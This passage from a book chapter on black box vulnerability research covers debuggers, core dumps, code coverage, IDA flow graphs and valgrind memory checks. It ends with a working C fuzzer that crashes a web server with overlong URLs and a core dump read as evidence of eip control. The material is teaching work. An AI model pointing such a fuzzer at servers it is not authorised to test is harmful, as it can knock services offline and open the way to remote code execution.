attempts. If a black box input can be generated to trigger a program exception,
detailed analysis of the CPU registers and memory contents captured by the debugger
makes it possible to understand what avenues of exploitation might be available as a
result of a crash.
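A full debugger is not required merely to learn that an input caused a crash. As a rough sketch, assuming a POSIX system, a test harness can run the target in a child process and ask the operating system which signal, if any, terminated it. The names run_and_get_signal, target_ok, and target_crash are hypothetical, and the two targets are stand-ins for a real program under test. Unlike a debugger, this approach reports only that a crash occurred; it captures no register or memory state.

```c
#define _POSIX_C_SOURCE 200809L
#include <assert.h>
#include <signal.h>
#include <sys/types.h>
#include <sys/wait.h>
#include <unistd.h>

/* Hypothetical stand-ins for a program under test. */
void target_ok(void)    { /* returns normally */ }
void target_crash(void) { raise(SIGSEGV); /* simulate a memory fault */ }

/* Run target() in a child process. Returns the number of the signal that
 * killed the child, 0 if it exited on its own, or -1 if fork/waitpid fails. */
int run_and_get_signal(void (*target)(void)) {
    assert(target != NULL);
    pid_t pid = fork();
    if (pid < 0) return -1;
    if (pid == 0) {
        /* Child: make sure a fault terminates the process rather than
         * being caught by an inherited handler, then run the target. */
        signal(SIGSEGV, SIG_DFL);
        target();
        _exit(0);
    }
    int status = 0;
    if (waitpid(pid, &status, 0) < 0) return -1;
    return WIFSIGNALED(status) ? WTERMSIG(status) : 0;
}
```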
The use of debuggers needs to be well thought out. Threaded programs and programs
that fork can be difficult for debuggers to follow.
NOTE A fork operation creates a second copy, including all state, variable, and
open file information, of a process. Following the fork, two identical processes
exist distinguishable only by their process IDs. The forking process is termed
the parent and the newly forked process is termed the child. The parent and
child processes continue execution independently of each other.
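The behavior described in the preceding note can be observed with a few lines of C. This is a minimal sketch, assuming a POSIX system; fork_copy_demo is a hypothetical name. The child changes its own copy of a variable, and the copy held by the parent is unaffected.

```c
#define _POSIX_C_SOURCE 200809L
#include <assert.h>
#include <sys/types.h>
#include <sys/wait.h>
#include <unistd.h>

/* Returns the parent's copy of `value` after the child has modified its own
 * copy, or -1 if fork or waitpid fails. */
int fork_copy_demo(void) {
    int value = 42;
    pid_t pid = fork();
    if (pid < 0) return -1;
    if (pid == 0) {              /* child: fork() returned 0 */
        value = 99;              /* changes only the child's copy */
        _exit(value == 99 ? 0 : 1);
    }
    /* Parent: fork() returned the child's process ID, which is the only
     * thing that distinguishes the two processes at this point. */
    assert(pid != getpid());
    int status = 0;
    if (waitpid(pid, &status, 0) < 0) return -1;
    return value;                /* the parent's copy was never touched */
}
```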
Following a fork operation, a decision must be made to follow and debug the child
process, or to stick with and continue debugging the parent process. Obviously, if you
choose the wrong process, you may completely fail to observe an exploitable opportunity
in the opposing process. For processes that are known to fork, it is occasionally an
option to launch the process in nonforking mode. This option should be considered if
black box testing is to be performed on such an application. When forking cannot be
prevented, a thorough understanding of the capabilities of your debugger is a must. For
some operating system/debugger combinations it is not possible for the debugger to follow
a child process after a fork operation. If it is the child process you are interested in
testing, some way of attaching to the child after the fork has occurred is required.
NOTE The act of attaching a debugger to a process refers to using a
debugger to latch onto a process that is already running. This is different from
the common operation of launching a process under debugger control. When
a debugger attaches to a process, the process is paused and will not resume
execution until a user instructs the debugger to do so.
When using a GUI-based debugger, attaching to a process is usually accomplished via
a menu option (such as File | Attach) that presents a list of currently executing processes.
Console-based debuggers, on the other hand, usually offer an attach command that
requires a process ID obtained from a process listing command such as ps.
In the case of network servers, it is common to fork immediately after accepting a new
client connection in order to allow a child process to handle the new connection while
the parent continues to accept additional connection requests. By delaying any data
transmission to the newly forked child, you can take the time to learn the process ID of
the new child and attach to it with a debugger. Once you have attached to the child, you
can allow the client to continue its normal operation (usually fault injection in this
case), and the debugger will catch any problems that occur in the child process rather
than the parent. The GNU debugger, gdb, has an option named follow-fork-mode
designed for just this situation. Under gdb, follow-fork-mode can be set to parent,
child, or ask, such that gdb will stay with the parent, follow the child, or ask the user
what to do when a fork occurs.
NOTE gdb’s follow-fork-mode is not available on all architectures.
Another useful feature available in some debuggers is the ability to analyze a core
dump file. A core dump is simply a snapshot of a process’s state, including memory contents
and CPU register values, at the time an exception occurs in a process. Core dumps
are generated by some operating systems when a process terminates as a result of an
unhandled exception such as an invalid memory reference. Core dumps are particularly
useful when attaching to a process is difficult to accomplish. If the process can be made
to crash, you can examine the core dump file and obtain all of the same information you
would have gotten had you been attached to the process with a debugger at the moment
it crashed. Core dumps may be limited in size on some systems (they can take up quite a
bit of space), and may not appear at all if the size limit is set to zero. Commands to
enable the generation of core files vary from system to system. On a Linux system using
the bash shell, the command to enable core dumps looks like this:
# ulimit -c unlimited
The last consideration for debuggers is that of kernel versus user space debugging.
When performing black box testing of user space applications, which includes most network
server software, user space debuggers usually provide adequate monitoring capabilities.
OllyDbg, written by Oleh Yuschuk, and WinDbg (available from Microsoft) are
two user space debuggers for the Microsoft Windows family of operating systems. gdb is
the principal user space debugger for Unix/Linux operating systems.
To monitor kernel level software such as device drivers, kernel level debuggers are
required. Unfortunately, in the Linux world at least, kernel level debugging tools are not terribly
sophisticated at the moment. On the Windows side, Microsoft’s WinDbg has become
the kernel debugger of choice following the demise of Compuware’s SoftIce product.
Code Coverage Tools
Code coverage tools give developers an idea of what portions of their programs are actually
getting executed. Such tools are excellent aids for test case development. Given
results that show what sections of code have and have not been executed, additional test
cases can be designed to cause execution to reach larger and larger percentages of the
program. Unfortunately, coverage tools are generally more useful to the software developer
than to the vulnerability researcher. They can point out the fact that you have or
have not reached a particular section of code, but indicate nothing about the correctness
of that code. Further complicating matters, commercial coverage tools often integrate
into the compilation phase of program development. This is obviously a problem if you
are conducting black box analysis of a binary program, as you will not be in possession
of the original source code.
There are two principal cases in which code coverage tools can assist in exploit development.
One case arises when a researcher has located a vulnerability by some other means
and wishes to understand exactly how that vulnerability can be triggered by understanding
how data flows through the program. The second case is in conjunction with fuzzing
tools to understand what percentage of an application has been reached via generated
fuzzing inputs. In the second case, the fuzzing process can be tuned to attempt to reach
code that is not getting executed initially. Here the code coverage tool becomes an essential
feedback tool used to evaluate the effectiveness of the fuzzing effort.
Pedram Amini’s Process Stalker is a powerful, freely available code coverage tool
designed to perform in the black box testing environment. Process Stalker consists of two
principal components and some post-processing utilities. The heart of Process Stalker is
its tracing module, which requires a list of breakpoints and the name or process ID of a
process to stalk as input. Breakpoint lists are currently generated using an IDA Pro plug-in
module that extracts the block structure of the program from an IDA disassembly and
generates a list of addresses that represent the first instruction in each basic block within
the program. At the same time, the plug-in generates GML (Graph Modeling Language)
files to represent each function in the target program. These graph files form the basis of
Process Stalker’s visualization capabilities when they are combined with runtime information
gathered by the tracer. As an aside, these graph files can be used with third-party
graphing tools such as GDE Community Edition from www.oreas.com to provide an alternative
to IDA’s built-in graphing capabilities. The tracer is then used to attach to or launch
the desired process, and it sets breakpoints according to the breakpoint list. Once breakpoints
have been set, the tracer allows the target program to continue execution and the
tracer makes note of all breakpoints that are hit. The tracer can optionally clear each
breakpoint when the breakpoint is hit for the first time in order to realize a tremendous
speedup. Recall that the goal of code coverage is to determine whether all branches have
been reached, not necessarily to count the number of times they have been reached. To
count the number of times an instruction has been executed, breakpoints must remain in
place for the lifetime of the program. Setting breakpoints on every instruction in a program
would be very costly from a performance perspective. To reduce the amount of overhead
required, Process Stalker, like BinDiff, leverages the concept of a basic block of code.
When setting breakpoints, it is sufficient to set a breakpoint only on the first instruction of
each basic block, since a fundamental property of basic blocks is that once the first
instruction in a block is hit, all remaining instructions in the block are guaranteed to be
executed in order. As the target program runs under the tracer’s control, the tracer logs
each breakpoint that is hit and immediately resumes execution of the target program. A
simple example of determining the process ID of a Windows process and running a trace
on it is shown in the following:
# tasklist /FI "IMAGENAME eq calc.exe"
Image Name                   PID Session Name     Session#    Mem Usage
========================= ====== ================ ======== ============
calc.exe                    1844 Console                 0      2,704 K
# ./process_stalker -a 1844 -b calc.exe.bpl -r 0 --one-time --no-regs
For brevity, the console output of process_stalker is omitted. The example shows how a
process ID might be obtained, using the Windows tasklist command, and then passed
to the process_stalker command to initiate a trace. The process_stalker command
expects to be told the name of a breakpoint list, calc.exe.bpl in this case, which was previously
generated using the IDA plug-in component of Process Stalker. Once a trace is
complete, the post-processing utilities (a set of Python scripts) are used to process and
merge the trace results to yield graphs annotated with the gathered trace data.
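The bookkeeping behind one-time basic block breakpoints can be sketched as follows. This is an illustration of the idea only and is not Process Stalker's code; the structure block_bp and the functions record_hit and coverage_percent are hypothetical, and the real work of setting and clearing breakpoints in the target process is omitted.

```c
#include <assert.h>
#include <stddef.h>
#include <stdint.h>

/* One entry per basic block, keyed by the address of its first instruction. */
struct block_bp {
    uintptr_t addr;
    int armed;   /* 1 while the breakpoint is still set in the target */
    int hit;     /* 1 once the block has executed at least once */
};

/* Called when the tracer reports a breakpoint at addr. In one-time mode the
 * breakpoint is disarmed on its first hit, so the block costs nothing on
 * later executions. Returns 1 if the block is newly covered, 0 otherwise. */
int record_hit(struct block_bp *bps, size_t n, uintptr_t addr, int one_time) {
    assert(bps != NULL);
    for (size_t i = 0; i < n; i++) {
        if (bps[i].addr == addr && bps[i].armed) {
            int first = !bps[i].hit;
            bps[i].hit = 1;
            if (one_time) bps[i].armed = 0;
            return first;
        }
    }
    return 0;
}

/* Percentage of basic blocks reached so far, in the range 0 to 100. */
double coverage_percent(const struct block_bp *bps, size_t n) {
    assert(bps != NULL);
    if (n == 0) return 0.0;
    size_t hits = 0;
    for (size_t i = 0; i < n; i++) hits += bps[i].hit ? 1 : 0;
    return 100.0 * (double)hits / (double)n;
}
```

Leaving breakpoints armed (one_time set to 0) would allow hit counts to be kept instead of a simple flag, at the performance cost described above.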
Profiling Tools
Profiling tools are used to develop statistics about how much time a program spends in
various sections of code. This might include information on how frequently a particular
function is called, and how much execution time is spent in various functions or loops.
Developers utilize this information in an attempt to improve the performance of their
programs. The basic idea is that performance can be visibly improved by making the
most commonly used portions of code very fast. Like coverage tools, profiling tools may
not be of tremendous use in locating vulnerabilities in software. Exploit developers care
little whether a particular program is fast or slow; they care simply whether the program
can be exploited.
Flow Analysis Tools
Flow analysis tools assist in understanding the flow of control or data within a program.
Flow analysis tools can be run against source code or binary code, and often generate
various types of graphs to assist in visualizing how the portions of a program interact.
IDA Pro offers control flow visualization through its graphing capabilities. The graphs
that IDA generates are depictions of all of the cross-referencing information that IDA
develops as it analyzes a binary. Figure 14-1 shows a function call tree generated by IDA
for a very simple program using IDA’s Xrefs From (cross-references from) menu option.
In this case we see all of the functions referenced from a function named sub_804882F,
and the graph answers the question “Where do we go from here?” To generate such a display,
IDA performs a recursive descent through all functions called by sub_804882F.
Graphs such as that in Figure 14-1 generally terminate at library or system calls for
which IDA has no additional information.
Another useful graph that IDA can generate comes from the Xrefs To option. Cross-references
to a function lead us to the points at which that function is called and answer the
question “How did we get here?” Figure 14-2 is an example of the cross-references to the
function send in a simple program. The display reveals the most likely points of origin for
data that will be passed into the send function (should that function ever get called).
Graphs such as that in Figure 14-2 often ascend all the way up to the entry point of a
program.
Figure 14-1 Function call tree for function sub_804882F
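The two cross-reference traversals described above can be sketched over a small call graph stored as an adjacency matrix. This is only an illustration of the recursive descent idea and is not IDA's implementation; MAX_FUNCS, the numbering of functions by index, and the names xrefs_from and xrefs_to are all assumptions.

```c
#include <assert.h>
#include <stddef.h>

#define MAX_FUNCS 8   /* hypothetical upper bound on functions in the graph */

/* calls[i][j] != 0 means function i contains a call to function j. */

/* "Where do we go from here?": recursive descent that marks every function
 * reachable from `from`. seen[] must be zeroed by the caller. */
void xrefs_from(int calls[MAX_FUNCS][MAX_FUNCS], int from, int seen[MAX_FUNCS]) {
    assert(from >= 0 && from < MAX_FUNCS);
    for (int j = 0; j < MAX_FUNCS; j++) {
        if (calls[from][j] && !seen[j]) {
            seen[j] = 1;              /* mark first so call cycles terminate */
            xrefs_from(calls, j, seen);
        }
    }
}

/* "How did we get here?": follow call edges backward and mark every function
 * from which `to` can eventually be reached. seen[] must be zeroed first. */
void xrefs_to(int calls[MAX_FUNCS][MAX_FUNCS], int to, int seen[MAX_FUNCS]) {
    assert(to >= 0 && to < MAX_FUNCS);
    for (int i = 0; i < MAX_FUNCS; i++) {
        if (calls[i][to] && !seen[i]) {
            seen[i] = 1;
            xrefs_to(calls, i, seen);
        }
    }
}
```

In this representation, functions with no outgoing edges play the role of the library or system calls at which the descent stops.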
A third type of graph available in IDA Pro is the function flowchart graph. As shown
in Figure 14-3, the function flowchart graph provides a much more detailed look at the
flow of control within a specific function.
One shortcoming of IDA’s graphing functionality is that many of the graphs it generates
are static, meaning that they can’t be manipulated, and thus they can’t be saved for
viewing with third-party graphing applications. This shortcoming is addressed by
BinNavi and to some extent Process Stalker.
The preceding examples demonstrate control flow analysis. Another form of flow analysis
examines the ways in which data transits a program. Reverse data tracking attempts
to locate the origin of a piece of data. This is useful in determining the source of data
supplied to a vulnerable function. Forward data tracking attempts to track data from its
point of origin to the locations in which it is used. Unfortunately, static analysis of data
through conditional and looping code paths is a difficult task at best. For more information
on data flow analysis techniques, please refer to the Chevarista tool mentioned in
Chapter 12.
Memory Monitoring Tools
Some of the most useful tools for black box testing are those that monitor the way that a
program uses memory at runtime. Memory monitoring tools can detect the following
types of errors:
• Accessing uninitialized memory
• Access outside of allocated memory areas
• Memory leaks
• Multiple release (freeing) of memory blocks
Figure 14-2 Cross-references to the send function
CAUTION Dynamic memory allocation takes place in a program’s heap space.
Programs should return all dynamically allocated memory to the heap
manager at some point. When a program loses track of a memory block by
modifying the last pointer reference to that block, it no longer has the ability
to return that block to the heap manager. This inability to free an allocated block is called
a memory leak. While memory leaks may not lead directly to exploitable conditions, the
leaking of a sufficient amount of memory can exhaust the memory available in the
program heap. At a minimum this will generally result in some form of denial of service.
Figure 14-3 IDA-generated flowchart for sub_80487EB
Each of these types of memory problems has been known to cause various vulnerable
conditions from program crashes to remote code execution.
valgrind
valgrind is an open source memory debugging and profiling system for Linux x86 program
binaries. valgrind can be used with any compiled x86 binary; no source code is
required. It is essentially an instrumented x86 interpreter that carefully tracks memory
accesses performed by the program being interpreted. Basic valgrind analysis is performed
from the command line by invoking the valgrind wrapper and naming the
binary that it should execute. To use valgrind with the following example:
/*
 * valgrind_1.c - uninitialized memory access
 */
int main() {
    int p, t;
    if (p == 5) { /* Error occurs here */
        t = p + 1;
    }
    return 0;
}
you simply compile the code and then invoke valgrind as follows:
# gcc -o valgrind_1 valgrind_1.c
# valgrind ./valgrind_1
valgrind runs the program and displays memory use information as shown here:
==16541== Memcheck, a.k.a. Valgrind, a memory error detector for x86-linux.
==16541== Copyright (C) 2002-2003, and GNU GPL'd, by Julian Seward.
==16541== Using valgrind-2.0.0, a program supervision framework for x86-linux.
==16541== Copyright (C) 2000-2003, and GNU GPL'd, by Julian Seward.
==16541== Estimated CPU clock rate is 3079 MHz
==16541== For more details, rerun with: -v
==16541==
==16541== Conditional jump or move depends on uninitialised value(s)
==16541== at 0x8048328: main (in valgrind_1)
==16541== by 0xB3ABBE: __libc_start_main (in /lib/libc-2.3.2.so)
==16541== by 0x8048284: (within valgrind_1)
==16541==
==16541== ERROR SUMMARY: 1 errors from 1 contexts (suppressed: 0 from 0)
==16541== malloc/free: in use at exit: 0 bytes in 0 blocks.
==16541== malloc/free: 0 allocs, 0 frees, 0 bytes allocated.
==16541== For a detailed leak analysis, rerun with: --leak-check=yes
==16541== For counts of detected errors, rerun with: -v
In the example output, the number 16541 in the left margin is the process ID (pid) of
the valgrind process. The first line of output explains that valgrind is making use of its
memcheck tool to perform its most complete analysis of memory use. Following the
copyright notice, you see the single error message that valgrind reports for the example
program. In this case, the variable p is being read before it has been initialized. Because
valgrind operates on compiled programs, it reports virtual memory addresses in its
error messages rather than referencing original source code line numbers. The ERROR
SUMMARY at the bottom is self-explanatory.
A second simple example demonstrates valgrind’s heap-checking capabilities. The
source code for this example is as follows:
/*
 * valgrind_2.c - access outside of allocated memory
 */
#include <stdlib.h>
int main() {
    int *p, a;
    p = malloc(10 * sizeof(int));
    p[10] = 1; /* invalid write error */
    a = p[10]; /* invalid read error */
    free(p);
    return 0;
}
This time valgrind reports errors for an invalid write and read outside of allocated
memory space. Additionally, summary statistics report on the number of bytes of memory
dynamically allocated and released during program execution. This feature makes it
very easy to recognize memory leaks within programs.
==16571== Invalid write of size 4
==16571== at 0x80483A2: main (in valgrind_2)
==16571== by 0x398BBE: __libc_start_main (in /lib/libc-2.3.2.so)
==16571== by 0x80482EC: (within valgrind_2)
==16571== Address 0x52A304C is 0 bytes after a block of size 40 alloc'd
==16571== at 0x90068E: malloc (vg_replace_malloc.c:153)
==16571== by 0x8048395: main (in valgrind_2)
==16571== by 0x398BBE: __libc_start_main (in /lib/libc-2.3.2.so)
==16571== by 0x80482EC: (within valgrind_2)
==16571==
==16571== Invalid read of size 4
==16571== at 0x80483AE: main (in valgrind_2)
==16571== by 0x398BBE: __libc_start_main (in /lib/libc-2.3.2.so)
==16571== by 0x80482EC: (within valgrind_2)
==16571== Address 0x52A304C is 0 bytes after a block of size 40 alloc'd
==16571== at 0x90068E: malloc (vg_replace_malloc.c:153)
==16571== by 0x8048395: main (in valgrind_2)
==16571== by 0x398BBE: __libc_start_main (in /lib/libc-2.3.2.so)
==16571== by 0x80482EC: (within valgrind_2)
==16571==
==16571== ERROR SUMMARY: 2 errors from 2 contexts (suppressed: 0 from 0)
==16571== malloc/free: in use at exit: 0 bytes in 0 blocks.
==16571== malloc/free: 1 allocs, 1 frees, 40 bytes allocated.
==16571== For a detailed leak analysis, rerun with: --leak-check=yes
==16571== For counts of detected errors, rerun with: -v
The types of errors reported in this case might easily be caused by off-by-one errors or a
heap-based buffer overflow condition.
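As an illustration of how easily such an error arises, consider copying a string to the heap. The sketch below (copy_string is a hypothetical name) shows the correct allocation; the comment describes the off-by-one variant that would cause valgrind to report an invalid write similar to the one above.

```c
#include <assert.h>
#include <stdlib.h>
#include <string.h>

/* Return a heap copy of s, or NULL if allocation fails.
 * The caller is responsible for calling free() on the result. */
char *copy_string(const char *s) {
    assert(s != NULL);
    size_t len = strlen(s);
    /* Off-by-one variant: malloc(len) leaves no room for the terminator,
     * so the final write below would land one byte past the block. */
    char *copy = malloc(len + 1);
    if (copy == NULL) return NULL;
    memcpy(copy, s, len);
    copy[len] = '\0';
    return copy;
}
```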
The last valgrind example demonstrates reporting of both a memory leak and a double
free problem. The example code is as follows:
/*
 * valgrind_3.c - memory leak/double free
 */
#include <stdlib.h>
int main() {
    int *p;
    p = (int*)malloc(10 * sizeof(int));
    p = (int*)malloc(40 * sizeof(int)); //first block has now leaked
    free(p);
    free(p); //double free error
    return 0;
}
NOTE A double free condition occurs when the free function is called a
second time for a pointer that has already been freed. The second call to
free corrupts heap management information that can result in an exploitable
condition.
The results for this last example follow. In this case, valgrind was invoked with the
detailed leak checking turned on:
# valgrind --leak-check=yes ./valgrind_3
This time an error is generated by the double free, and the leak summary reports that the
program failed to release 40 bytes of memory that it had previously allocated:
==16584== Invalid free() / delete / delete[]
==16584== at 0xD1693D: free (vg_replace_malloc.c:231)
==16584== by 0x80483C7: main (in valgrind_3)
==16584== by 0x126BBE: __libc_start_main (in /lib/libc-2.3.2.so)
==16584== by 0x80482EC: (within valgrind_3)
==16584== Address 0x47BC07C is 0 bytes inside a block of size 160 free'd
==16584== at 0xD1693D: free (vg_replace_malloc.c:231)
==16584== by 0x80483B9: main (in valgrind_3)
==16584== by 0x126BBE: __libc_start_main (in /lib/libc-2.3.2.so)
==16584== by 0x80482EC: (within valgrind_3)
==16584==
==16584== ERROR SUMMARY: 1 errors from 1 contexts (suppressed: 0 from 0)
==16584== malloc/free: in use at exit: 40 bytes in 1 blocks.
==16584== malloc/free: 2 allocs, 2 frees, 200 bytes allocated.
==16584== For counts of detected errors, rerun with: -v
==16584== searching for pointers to 1 not-freed blocks.
==16584== checked 4664864 bytes.
==16584==
==16584== 40 bytes in 1 blocks are definitely lost in loss record 1 of 1
==16584== at 0xD1668E: malloc (vg_replace_malloc.c:153)
==16584== by 0x8048395: main (in valgrind_3)
==16584== by 0x126BBE: __libc_start_main (in /lib/libc-2.3.2.so)
==16584== by 0x80482EC: (within valgrind_3)
==16584==
==16584== LEAK SUMMARY:
==16584== definitely lost: 40 bytes in 1 blocks.
==16584== possibly lost: 0 bytes in 0 blocks.
==16584== still reachable: 0 bytes in 0 blocks.
==16584== suppressed: 0 bytes in 0 blocks.
==16584== Reachable blocks (those to which a pointer was found) are not shown.
==16584== To see them, rerun with: --show-reachable=yes
While the preceding examples are trivial, they do demonstrate the value of valgrind
as a testing tool. Should you choose to fuzz a program, valgrind can be a critical piece of
instrumentation that helps to quickly isolate memory problems, in particular heap-based
buffer overflows, which manifest themselves as invalid reads and writes in
valgrind.
References
Process Stalker http://pedram.redhive.com/code/process_stalker/
GDE Community Edition www.oreas.com
OllyDbg www.ollydbg.de/
WinDbg www.microsoft.com/whdc/devtools/debugging
Valgrind http://valgrind.kde.org/
Fuzzing
Black box testing works because you can apply some external stimulus to a program and
observe how the program reacts to that stimulus. Monitoring tools give you the capability
to observe the program’s reactions. All that is left is to provide interesting inputs to
the program being tested. As mentioned previously, fuzzing tools are designed for
exactly this purpose, the rapid generation of input cases designed to induce errors in a
program. Because the number of inputs that can be supplied to a program is infinite, the
last thing you want to do is attempt to generate all of your input test cases by hand. It is
entirely possible to build an automated fuzzer to step through every possible input
sequence in a brute-force manner and attempt to generate errors with each new input
value. Unfortunately, most of those input cases would be utterly useless and the amount
of time required to stumble across some useful ones would be prohibitive. The real challenge
of fuzzer development is building them in such a way that they generate interesting
input in an intelligent, efficient manner. An additional problem is that it is very
difficult to develop a generic fuzzer. To reach the many possible code paths for a given
program, a fuzzer usually needs to be somewhat “protocol aware.” For example, a fuzzer
built with the goal of overflowing query parameters in an HTTP request is unlikely to
contain sufficient protocol knowledge to also fuzz fields in an SSH key exchange.
Also, the differences between ASCII and non-ASCII protocols make it more than a trivial
task to port a fuzzer from one application domain to another.
NOTE The Hypertext Transfer Protocol (HTTP) is an ASCII-based protocol
described in RFC 2616. SSH is a binary protocol described in various
Internet-Drafts. RFCs and Internet-Drafts are available online at www.ietf.org.
Instrumented Fuzzing Tools and Techniques
Fuzzing should generally be performed with some form of instrumentation in place.
The goal of fuzzing is to induce an observable error condition in a program. Tools such
as memory monitors and debuggers are ideally suited for use with fuzzers. For example,
valgrind will report when a fuzzer has caused a program executing under valgrind control
to overflow a heap-allocated buffer. Debuggers will usually catch the fault induced
when an invalid memory reference is made as a result of fuzzer provided input. Following
the observation of an error, the difficult job of determining whether the error is
exploitable really begins. Exploitability determination will be discussed in the next
chapter.
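When no debugger or memory monitor is attached, a fuzzer can still observe the most basic error condition, a fatal signal, by running each test case in a child process. The following is a minimal sketch under that assumption; run_test_case, benign_case, and crashing_case are hypothetical names, and a real harness would exec the target program rather than call a function.

```c
#include <signal.h>
#include <sys/types.h>
#include <sys/wait.h>
#include <unistd.h>

/* Run one test case in a child process.
 * Returns the number of the signal that killed the child,
 * 0 if the child exited normally, or -1 if fork/waitpid failed. */
int run_test_case(void (*test_case)(void)) {
    int status;
    pid_t pid = fork();
    if (pid < 0) return -1;
    if (pid == 0) {            /* child: run the case, then exit cleanly */
        test_case();
        _exit(0);
    }
    if (waitpid(pid, &status, 0) < 0) return -1;
    if (WIFSIGNALED(status))   /* child was terminated by a signal */
        return WTERMSIG(status);
    return 0;
}

/* Two stand-in test cases used only to exercise the harness. */
void benign_case(void) { }
void crashing_case(void) { raise(SIGSEGV); }
```

A return value of SIGSEGV (signal 11) is the same condition that the debugger and core dump examples in this chapter report as a segmentation fault.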
A variety of fuzzing tools exist in both the open source and the commercial world.
These tools range from stand-alone fuzzers to fuzzer development environments. In this
chapter, we will discuss the basic approach to fuzzing, as well as introduce a fuzzer
development framework. Chapters 15 and 17 will cover several more recent fuzzing
tools including fuzzers tailored to specific application domains.
A Simple URL Fuzzer
As an introduction to fuzzers, we will look at a simple program for fuzzing web servers.
Our only goal is to grow a long URL and see what effect it has on a target web server. The
following program is not at all sophisticated, but it demonstrates several elements common
to most fuzzers and will assist in understanding more advanced examples:
1: /* simple_http_fuzzer.c */
2: #include <stdio.h>
3: #include <stdlib.h>
4: #include <string.h>
5: #include <unistd.h>
6: #include <sys/socket.h>
7: #include <netinet/in.h>
8: #include <arpa/inet.h>
9: #define MAX_NAME_LEN 2048 //maximum length to grow our url
10: #define MAX_IP_LEN 16 //max strlen of a valid IP address + null
11: //static HTTP protocol content into which we insert fuzz string;
12: //%*s reserves a field whose width is supplied as an argument
13: char request[] = "GET %*s.html HTTP/1.1\r\nHost: %s\r\n\r\n";
14: int main(int argc, char **argv) {
15:    //buffer to build our long request
16:    char buf[MAX_NAME_LEN + sizeof(request) + MAX_IP_LEN];
17:    //server address structure
18:    struct sockaddr_in server;
19:    int sock, len, req_len;
20:    if (argc != 2) { //require IP address on the command line
21:       fprintf(stderr, "Missing server IP address\n");
22:       exit(1);
23:    }
24:    memset(&server, 0, sizeof(server)); //clear the address info
25:    server.sin_family = AF_INET; //building an IPV4 address
26:    server.sin_port = htons(80); //connecting to port 80
27:    //convert the dotted IP in argv[1] into network representation
28:    if (inet_pton(AF_INET, argv[1], &server.sin_addr) <= 0) {
29:       fprintf(stderr, "Invalid server IP address: %s\n", argv[1]);
30:       exit(1);
31:    }
32:    //This is the basic fuzzing loop. We loop, growing the url by
33:    //4 characters per pass until an error occurs or we reach MAX_NAME_LEN
34:    for (len = 4; len < MAX_NAME_LEN; len += 4) {
35:       //first we need to connect to the server, create a socket...
36:       sock = socket(AF_INET, SOCK_STREAM, 0);
37:       if (sock == -1) {
38:          fprintf(stderr, "Could not create socket, quitting\n");
39:          exit(1);
40:       }
41:       //and connect to port 80 on the web server
42:       if (connect(sock, (struct sockaddr*)&server, sizeof(server))) {
43:          fprintf(stderr, "Failed connect to %s, quitting\n", argv[1]);
44:          close(sock);
45:          exit(1); //terminate if we can't connect
46:       }
47:       //build the request string. Request really only reserves space for
48:       //the name field that we are fuzzing (using the * format specifier)
49:       req_len = snprintf(buf, sizeof(buf), request, len, "A", argv[1]);
50:       //this actually copies the growing number of A's into the request
51:       memset(buf + 4, 'A', len);
52:       //now send the request to the server
53:       send(sock, buf, req_len, 0);
54:       //try to read the server response, for simplicity's sake let's assume
55:       //that the remote side choked if no bytes are read or a recv error
56:       //occurs
57:       if (recv(sock, buf, sizeof(buf), 0) <= 0) {
58:          fprintf(stderr, "Bad recv at len = %d\n", len);
59:          close(sock);
60:          break; //a recv error occurred, report it and stop looping
61:       }
62:       close(sock);
63:    }
64:    return 0;
65: }
The essential elements of this program are its knowledge, albeit limited, of the HTTP
protocol contained entirely in line 13, and the loop in lines 34–63 that sends a new
request to the server being fuzzed after generating a new larger filename for each pass
through the loop. The only portion of the request that changes between connections is
the filename field (%*s) that gets larger and larger as the variable len increases. The
asterisk in the format specifier instructs the snprintf() function to set the length according
to the value specified by the next variable in the parameter list, in this case len. The
remainder of the request is simply static content required to satisfy parsing expectations
on the server side. As len grows with each pass through the loop, the length of the filename
passed in the requests grows as well. Assume for example purposes that the web
server we are fuzzing, bad_httpd, blindly copies the filename portion of a URL into a
256-byte, stack-allocated buffer. You might see output such as the following when running
this simple fuzzer:
# ./simple_http_fuzzer 127.0.0.1
# Bad recv at len = 276
From this output you might conclude that the server is crashing when you grow your
filename to 276 characters. With appropriate debugger output available, you might also
find out that your input overwrites a saved return address and that you have the potential
for remote code execution. For the previous test run, a core dump from the vulnerable
web server shows the following:
# gdb bad_httpd core.16704
Core was generated by './bad_httpd'.
Program terminated with signal 11, Segmentation fault.
#0 0x006c6d74 in ?? ()
This tells you that the web server terminated because of a memory access violation and
that execution halted at location 0x006c6d74, which is not a typical program address. In
fact, with a little imagination, you realize that it is not an address at all, but the string
“tml”. It appears that the last 4 bytes of the filename buffer have been loaded into eip,
causing a segfault. Since you can control the content of the URL, you can likely control
the content of eip as well, and you have found an exploitable problem.
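Reading a register value as text is easy to get backward, because x86 stores the least significant byte at the lowest address. The short sketch below, using a hypothetical helper named reg_to_ascii, unpacks a 32-bit value in memory order and prints a dot for any byte that is not printable. For 0x006c6d74 the bytes are 0x74, 0x6d, 0x6c, and 0x00, which is "tml" followed by the string's terminating null.

```c
#include <ctype.h>
#include <stdint.h>

/* Interpret a 32-bit register value as the 4 bytes a little-endian (x86)
 * machine would have loaded from memory, lowest address first.
 * Non-printable bytes are shown as '.'; out must hold 5 chars. */
void reg_to_ascii(uint32_t value, char out[5]) {
    for (int i = 0; i < 4; i++) {
        unsigned char byte = (value >> (8 * i)) & 0xff;
        out[i] = isprint(byte) ? (char)byte : '.';
    }
    out[4] = '\0';
}
```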
Note that this fuzzer does exactly one thing: it submits a single long filename to a web
server. A more interesting fuzzer might throw additional types of input at the target web
server, such as directory traversal strings. Any thoughts of building a more sophisticated
fuzzer from this example must take into account a variety of factors, such as:
• What additional static content is required to make new requests appear to be
valid? What if you wanted to fuzz particular HTTP request header fields, for
example?
• Additional checks imposed on the recv operation to allow graceful failure of
recv operations that time out. Possibilities include setting an alarm or using the
select function to monitor the status of the socket.
• Accommodating more than one fuzz string.
As an example, consider the following URL:
http://gimme.money.com/cgi-bin/login?user=smith&password=smithpass
What portions of this request might you fuzz? It is important to identify those portions
of a request that are static and those parts that are dynamic. In this case, the supplied
request parameter values smith and smithpass are logical targets for fuzzing, but
they should be fuzzed independently from each other, which requires either two separate
fuzzers (one to fuzz the user parameter and one to fuzz the password parameter), or
a single fuzzer capable of fuzzing both parameters at the same time. A multivariable
fuzzer requires nested iteration over all desired values of each variable being fuzzed, and
is therefore somewhat more complex to build than the simple single variable fuzzer in
the example.
Fuzzing Unknown Protocols
Building fuzzers for open protocols is often a matter of sitting down with an RFC and
determining static protocol content that you can hard-code and dynamic protocol content
that you may want to fuzz. Static protocol content often includes protocol-defined
